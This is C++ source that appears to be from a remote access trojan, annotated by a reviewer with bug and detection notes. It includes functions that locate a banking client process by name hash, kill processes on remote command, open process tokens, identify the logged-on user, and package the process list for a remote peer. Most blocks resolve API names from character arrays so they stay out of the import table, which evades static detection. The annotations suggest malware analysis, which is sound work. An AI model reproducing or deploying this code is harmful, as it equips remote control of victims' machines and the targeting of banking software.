// Walks a process snapshot and returns the PID of the first entry whose
// executable-name hash equals 0xFE0E05F6 (the original comment labels that
// value "cbmain.ex -> cbank.exe"). Matching is done on a hash, so the target
// name itself never appears in this block; the constant plus the comment are
// the only identification of what is being looked for.
//
// path: caller buffer of at least MAX_PATH bytes. It is written only when its
//       first byte is 0, in which case it receives the matched process's main
//       module path via GetModuleFileNameExA (result not checked).
// Returns the matched th32ProcessID, or 0 when no entry matches.
//
// NOTE(review): pCreateToolhelp32Snapshot, pProcess32FirstW, pProcess32NextW,
// pOpenProcess, pGetModuleFileNameExA, pCloseHandle and GetNameHash are
// defined/resolved outside this block. The snapshot handle and the
// Process32FirstW result are not checked, so on failure the loop hashes an
// uninitialised PROCESSENTRY32W before exiting.
// Detection note: the observable runtime behaviour is a TH32CS_SNAPPROCESS
// snapshot followed by OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ)
// on a single matched PID.
static DWORD IsRunBClient(char* path)
{
    HANDLE snap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    PROCESSENTRY32W pe;
    pe.dwSize = sizeof(pe);
    pProcess32FirstW( snap, &pe );
    DWORD ret = 0;
    do
    {
        DWORD dwProcessHash = GetNameHash(pe.szExeFile);
        if ( dwProcessHash == 0xFE0E05F6 ) //cbmain.ex -> cbank.exe
        {
            // Only resolve the image path when the caller has not supplied one.
            if( path[0] == 0 )
            {
                HANDLE hProc = pOpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe.th32ProcessID );
                if (hProc)
                {
                    pGetModuleFileNameExA( hProc, 0, path, MAX_PATH );
                    pCloseHandle(hProc);
                }
            }
            ret = pe.th32ProcessID;
            break;  // first match wins
        }
    } while( pProcess32NextW( snap, &pe ) );
    pCloseHandle(snap);
    return ret;
}
// Terminates every process whose PID is listed in lpBuffer, then pushes a
// refreshed process list and window list to the peer.
//
// lpBuffer: packed array of DWORD PIDs, read 4 bytes at a time.
// nSize:    length of lpBuffer in bytes. The loop reads *(LPDWORD)(lpBuffer+i)
//           for every i < nSize in steps of 4, so an nSize that is not a
//           multiple of 4 makes the last read run past the buffer end.
//
// NOTE(review): OpenProcess/TerminateProcess/CloseHandle/Sleep are resolved
// at runtime by GetProcAddress from names assembled in local char arrays, so
// none of them appears in this module's import table (relevant when hunting
// for this behaviour statically). None of the GetProcAddress results nor the
// OpenProcess handle is checked before use; LoadLibrary is called per lookup
// and never paired with FreeLibrary. lpBuffer presumably arrives from the
// remote side of the connection — confirm against the caller.
void CSystemManager::KillProcess(LPBYTE lpBuffer, UINT nSize)
{
    HANDLE hProcess = NULL;
    char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'};
    OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14);
    char FBwWp15[] = {'T','e','r','m','i','n','a','t','e','P','r','o','c','e','s','s','\0'};
    TerminateProcessT pTerminateProcess=(TerminateProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp15);
    char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
    CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
    // One PID per 4 bytes; PROCESS_ALL_ACCESS is requested for each.
    for (unsigned int i = 0; i < nSize; i += 4)
    {
        hProcess = pOpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(lpBuffer + i));
        pTerminateProcess(hProcess, 0);
        pCloseHandle(hProcess);
    }
    // Sleep briefly to avoid errors (original comment, translated)
    char FBwWp25[] = {'S','l','e','e','p','\0'};
    SleepT pSleep=(SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp25);
    pSleep(100);
    // Refresh the process list
    SendProcessList();
    // Refresh the window list
    SendWindowsList();
}
//=========================================================
// Opens the access token of the first running process whose executable name
// matches lpName (case-insensitive via _strupr on both sides).
//
// hToken: receives the opened token (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
//         when a matching process is found; otherwise left untouched.
// lpName: executable file name to match. _strupr modifies it IN PLACE, so the
//         caller's string is upper-cased as a side effect.
// Returns the OpenProcessToken result when a match is found. When the
// snapshot is walked to the end without a match the function returns TRUE
// even though hToken was never set; FALSE only for a NULL lpName, a failed
// snapshot, or a failed Process32First.
//
// NOTE(review): the process handle opened on the match (hProcess) is never
// closed; only the snapshot handle is. pe32.szExeFile is a TCHAR array but is
// passed to _strupr/strcmp, so this compiles only in a non-UNICODE build.
// All APIs are resolved via GetProcAddress from char-array names, so they do
// not appear in the import table. None of the GetProcAddress results is
// checked.
BOOL GetTokenByName(HANDLE &hToken,LPSTR lpName)
{
    if(!lpName)
    {
        return FALSE;
    }
    HANDLE hProcessSnap = NULL;
    BOOL bRet = FALSE;
    PROCESSENTRY32 pe32 = {0};
    char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'};
    char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'};
    CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10);
    hProcessSnap = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
        return (FALSE);
    pe32.dwSize = sizeof(PROCESSENTRY32);
    char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'};
    Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First);
    char CtxPW35[] = {'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n','\0'};
    OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),CtxPW35);
    char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
    CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
    char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'};
    OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14);
    char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'};
    Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next);
    if (pProcess32First(hProcessSnap, &pe32))
    {
        do
        {
            // Both strings are upper-cased in place before comparison.
            if(!strcmp(_strupr(pe32.szExeFile),_strupr(lpName)))
            {
                HANDLE hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pe32.th32ProcessID);
                // bRet = pOpenProcessToken(hProcess,TOKEN_ALL_ACCESS,&hToken);
                bRet = pOpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken);
                pCloseHandle (hProcessSnap);   // hProcess itself is not closed
                return (bRet);
            }
        } while (pProcess32Next(hProcessSnap, &pe32));
        bRet = TRUE;   // reached without a match: returns TRUE with hToken unset
    }
    else
        bRet = FALSE;
    pCloseHandle (hProcessSnap);
    return (bRet);
}
// Returns the account name of the user running explorer.exe, read from that
// process's token (TokenUser SID -> LookupAccountSidA).
//
// Returns a heap buffer of 256 chars allocated with new[] — the caller owns it
// and must delete[] it — or NULL when explorer.exe is not found or the
// function leaves before the buffer is allocated. Because the buffer is
// returned from the __finally block regardless of fResult, a LookupAccountSidA
// failure still hands back the (uninitialised) buffer.
//
// NOTE(review): `return` inside __finally is MSVC-specific SEH behaviour.
// pTokenUser is allocated as BYTE[] and freed as char[]. szDomainName is a
// TCHAR array passed where LookupAccountSidA expects LPSTR, so this compiles
// only when TCHAR is char. GetProcessID is defined elsewhere in the project.
// GetProcAddress results are not checked before the calls.
char *GetLogUser2K()
{
    typedef BOOL (WINAPI *OpenProcessTokenT)( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle );
    char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
    OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");
    typedef BOOL (WINAPI *LookupAccountSidAT)( __in_opt LPCSTR lpSystemName, __in PSID Sid, __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name, __inout LPDWORD cchName, __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName, __out PSID_NAME_USE peUse );
    LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA");
    typedef BOOL (WINAPI *GetTokenInformationT)( __in HANDLE TokenHandle, __in TOKEN_INFORMATION_CLASS TokenInformationClass, __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation, __in DWORD TokenInformationLength, __out_opt PDWORD ReturnLength );
    GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation");
    typedef HANDLE (WINAPI *OpenProcessT)( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId );
    OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess");
    DWORD dwProcessID = GetProcessID("explorer.exe");
    if (dwProcessID == 0)
        return NULL;
    BOOL fResult = FALSE;
    HANDLE hProc = NULL;
    HANDLE hToken = NULL;
    TOKEN_USER *pTokenUser = NULL;
    char *lpUserName = NULL;
    __try
    {
        // Open the process with PROCESS_QUERY_INFORMATION access
        hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID);
        if (hProc == NULL)
        {
            __leave;
        }
        fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken);
        if(!fResult)
        {
            __leave;
        }
        // First call only sizes the TOKEN_USER buffer.
        DWORD dwNeedLen = 0;
        fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen);
        if (dwNeedLen > 0)
        {
            pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen];
            fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen);
            if (!fResult)
            {
                __leave;
            }
        }
        else
        {
            __leave;
        }
        SID_NAME_USE sn;
        TCHAR szDomainName[MAX_PATH];
        DWORD dwDmLen = MAX_PATH;
        DWORD nNameLen = 256;
        lpUserName = new char[256];   // returned to caller; fResult below is not checked
        fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen, szDomainName, &dwDmLen, &sn);
    }
    __finally
    {
        if (hProc) ::CloseHandle(hProc);
        if (hToken) ::CloseHandle(hToken);
        if (pTokenUser) delete[] (char*)pTokenUser;
        return lpUserName;   // NULL unless the allocation above was reached
    }
}
// Determines the logged-on user by locating explorer.exe in a process
// snapshot, opening its token and resolving the TokenUser SID to an account
// name. Every step is logged through AddLog.
//
// csUserName: receives the account name on success (untouched on failure).
// Returns TRUE when a non-empty user name was resolved, FALSE otherwise.
//
// NOTE(review): hToken is declared without an initial value, yet the
// OpenProcessToken failure path calls CloseHandle(hToken) on it. The
// TOKEN_USER is read into a TCHAR[255] array (szTokenInformation) and the
// length passed is 255 regardless of sizeof(TCHAR); alignment of TOKEN_USER in
// a TCHAR array is not guaranteed — confirm on the target toolchain.
// explorer.exe is opened with PROCESS_ALL_ACCESS although only the token is
// needed. APIs are bound through GetProcAddress with A/W variants chosen by
// _UNICODE; this is the only block on the page that checks those results.
BOOL CSysInfo::getUserNameFromExplorerProcess(CString &csUserName)
{
    TCHAR szUserName[255];
    DWORD dwName = 255;
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof( PROCESSENTRY32 );
    HANDLE hToken;
    TOKEN_INFORMATION_CLASS TokenInformationClass = TokenUser;
    TCHAR szTokenInformation[255];
    DWORD dwTokenInformationLength = 255;//sizeof( TOKEN_OWNER );
    DWORD dwReturnLength=0;
    DWORD dwReferencedDomainName = 255;
    TCHAR szReferencedDomainName[255];
    SID_NAME_USE peUse;
    HANDLE hExplorer = NULL;
    HANDLE hSnapshot = NULL;
    HMODULE hAdv = NULL;
    BOOL bExplorerFound = FALSE;
    HANDLE (WINAPI* pCreateToolhelp32Snapshot) (DWORD, DWORD) = NULL;
    BOOL (WINAPI* pProcess32First) (HANDLE, LPPROCESSENTRY32) = NULL;
    BOOL (WINAPI* pProcess32Next) (HANDLE, LPPROCESSENTRY32) = NULL;
    HANDLE (WINAPI* pOpenProcess) (DWORD, BOOL, DWORD) = NULL;
    BOOL (WINAPI* pOpenProcessToken) (HANDLE, DWORD, PHANDLE) = NULL;
    BOOL (WINAPI* pLookupAccountSid) (LPCTSTR, PSID, LPTSTR, LPDWORD, LPTSTR, LPDWORD, PSID_NAME_USE ) = NULL;
    BOOL (WINAPI* pGetTokenInformation) (HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD) = NULL;

    AddLog( _T( "getUserNameFromExplorerProcess: Trying to find logged on User ID from <explorer.exe> process...\n"));
    // First, try to use Advapi.dll
    if( !(hAdv = LoadLibrary( _T( "Advapi32.dll"))))
    {
        AddLog( _T( "\tFailed to load AdvApi32 library !\n"));
        return FALSE;
    }
    // Bind the token/account APIs; the LookupAccountSid variant follows _UNICODE.
    if( !( (*(FARPROC*)&pOpenProcessToken = GetProcAddress( hAdv , "OpenProcessToken" ) ) )||
        !( (*(FARPROC*)&pOpenProcess = GetProcAddress( GetModuleHandle( _T( "KERNEL32.DLL")), "OpenProcess") ) )||
        !( (*(FARPROC*)&pGetTokenInformation = GetProcAddress( hAdv , "GetTokenInformation") ) )||
#ifdef _UNICODE
        !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidW") ) ) )
#else
        !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidA") ) ) )
#endif
    {
        AddLog( _T( "\tFailed to load AdvApi32 library with error <%i> !\n"), GetLastError());
        FreeLibrary( hAdv);
        return FALSE;
    }
    // Try to use kernel32 to enum process
    if( !(*(FARPROC*)&pCreateToolhelp32Snapshot = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "CreateToolhelp32Snapshot") ) ||
#ifdef _UNICODE
        !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32FirstW") ) ||
        !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32NextW") ) )
#else
        !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32First") ) ||
        !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32Next") ) )
#endif
    {
        AddLog( _T( "\tFailed to load Kernel32 process access functions with error <%i> !\n"), GetLastError());
        FreeLibrary( hAdv);
        return FALSE;
    }
    // Create snapshot of running processes
    if( (hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPALL ,0 )) == INVALID_HANDLE_VALUE )
    {
        AddLog( _T( "\tCreateToolhelp32Snapshot failed with error <%i> !\n"), GetLastError());
        FreeLibrary( hAdv);
        return FALSE;
    }
    // Trying to find explorer.exe into snapshot
    if( !pProcess32First( hSnapshot, &pe) )
    {
        AddLog( _T( "\tProcess32First failed with error <%i> !\n"), GetLastError());
        CloseHandle( hSnapshot );
        FreeLibrary( hAdv);
        return FALSE;
    }
    do
    {
        if( !CString(pe.szExeFile).CompareNoCase( _T( "explorer.exe")))
        {
            bExplorerFound = TRUE;
            break;
        }
        pe.dwSize = sizeof( PROCESSENTRY32 );
    } while (pProcess32Next( hSnapshot, &pe ));
    if (!bExplorerFound)
    {
        AddLog( _T( "\tCould not find <explorer.exe> process !\n"));
        CloseHandle( hSnapshot );
        FreeLibrary( hAdv);
        return FALSE;
    }
    // Retrieve a handle on explorer.exe process using ID
    if( !(hExplorer = pOpenProcess( PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID )))
    {
        AddLog( _T( "\tFailed to open <explorer.exe> process with error <%i> !\n"), GetLastError());
        CloseHandle( hSnapshot );
        FreeLibrary( hAdv);
        return FALSE;
    }
    // Open token associated to explorer.exe to get information
    if( !pOpenProcessToken( hExplorer, TOKEN_READ, &hToken ) )
    {
        AddLog( _T( "\tOpenProcessToken failed with error <%i>\n"), GetLastError());
        CloseHandle( hExplorer );
        CloseHandle( hToken );   // hToken was never assigned on this path
        CloseHandle( hSnapshot );
        FreeLibrary( hAdv);
        return FALSE;
    }
    if( !pGetTokenInformation( hToken, TokenInformationClass, &szTokenInformation, dwTokenInformationLength, &dwReturnLength))
    {
        AddLog( _T( "\tGetTokenInformation failed with error <%i>\n"), GetLastError());
        CloseHandle( hExplorer );
        CloseHandle( hToken );
        CloseHandle( hSnapshot );
        FreeLibrary( hAdv);
        return FALSE;
    }
    // Look up the user account running the explorer.exe process
    if( !pLookupAccountSid( NULL, ((TOKEN_USER*)&szTokenInformation)->User.Sid, szUserName, &dwName, szReferencedDomainName, &dwReferencedDomainName, &peUse ) )
    {
        AddLog( _T( "\tLookupAccountSid failed with error <%i>\n"), GetLastError());
        CloseHandle( hExplorer );
        CloseHandle( hToken );
        CloseHandle( hSnapshot );
        FreeLibrary( hAdv);
        return FALSE;
    }
    CloseHandle( hExplorer );
    CloseHandle( hToken );
    CloseHandle( hSnapshot );
    FreeLibrary( hAdv );
    // Ensure username exists
    if( CString(szUserName) == _T( "") )
    {
        AddLog( _T( "\tFound empty user, so assuming failed !\n"));
        return FALSE;
    }
    AddLog( _T( "\t\t<User: %s>\n\tOK\n"), szUserName);
    csUserName = szUserName;
    return TRUE;
}
// Builds a serialized list of running processes for transmission.
//
// Output layout (LocalAlloc'd buffer, trimmed to dwOffset at the end):
//   byte 0            : TOKEN_PSLIST tag
//   per process       : DWORD th32ProcessID,
//                       NUL-terminated szExeFile,
//                       NUL-terminated main-module path (GetModuleFileNameExA)
// PIDs 0, 4 and 8 are skipped. Returns NULL only if the snapshot fails;
// otherwise the buffer, which the caller presumably releases with LocalFree
// (confirm against the caller).
//
// NOTE(review): hProcess is opened for EVERY snapshot entry (before the PID
// filter) and is never closed — one leaked handle per process per call.
// strProcessName is zeroed once and not cleared between iterations, so when
// EnumProcessModules/GetModuleFileNameExA fail (results unchecked) the
// previous process's path is emitted for the current PID. LocalAlloc and the
// GetProcAddress results are not checked. All APIs are resolved at runtime
// from char-array names, so kernel32/psapi symbols used here are absent from
// the import table. Gyfunction->my_memcpy is a project helper defined
// elsewhere.
LPBYTE CSystemManager::getProcessList()
{
    HANDLE hSnapshot = NULL;
    HANDLE hProcess = NULL;
    HMODULE hModules = NULL;
    PROCESSENTRY32 pe32 = {0};
    DWORD cbNeeded;
    char strProcessName[MAX_PATH] = {0};
    LPBYTE lpBuffer = NULL;
    DWORD dwOffset = 0;
    DWORD dwLength = 0;
    char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'};
    char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'};
    CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10);
    hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hSnapshot == INVALID_HANDLE_VALUE)
        return NULL;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'};
    LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20);
    // Initial 1 KiB buffer; grown below as records are appended.
    lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024);
    lpBuffer[0] = TOKEN_PSLIST;
    dwOffset = 1;
    char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
    lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
    LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize");
    char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'};
    OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14);
    char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'};
    Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next);
    char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'};
    Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First);
    char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'};
    LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29);
    char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'};
    EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15);
    char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'};
    GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13);
    if(pProcess32First(hSnapshot, &pe32))
    {
        do
        {
            // Opened unconditionally and never closed (see header note).
            hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID);
            if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
            {
                pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
                pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName));
                // Size of the data this process occupies (PID + two NUL-terminated strings)
                dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2;
                // Buffer too small: reallocate to fit
                if (pLocalSize(lpBuffer) < (dwOffset + dwLength))
                    lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
                Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
                dwOffset += sizeof(DWORD);
                Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1);
                dwOffset += plstrlenA(pe32.szExeFile) + 1;
                Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1);
                dwOffset += plstrlenA(strProcessName) + 1;
            }
        } while(pProcess32Next(hSnapshot, &pe32));
    }
    // Shrink the buffer to the bytes actually written.
    lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
    char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
    CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
    pCloseHandle(hSnapshot);
    return lpBuffer;
}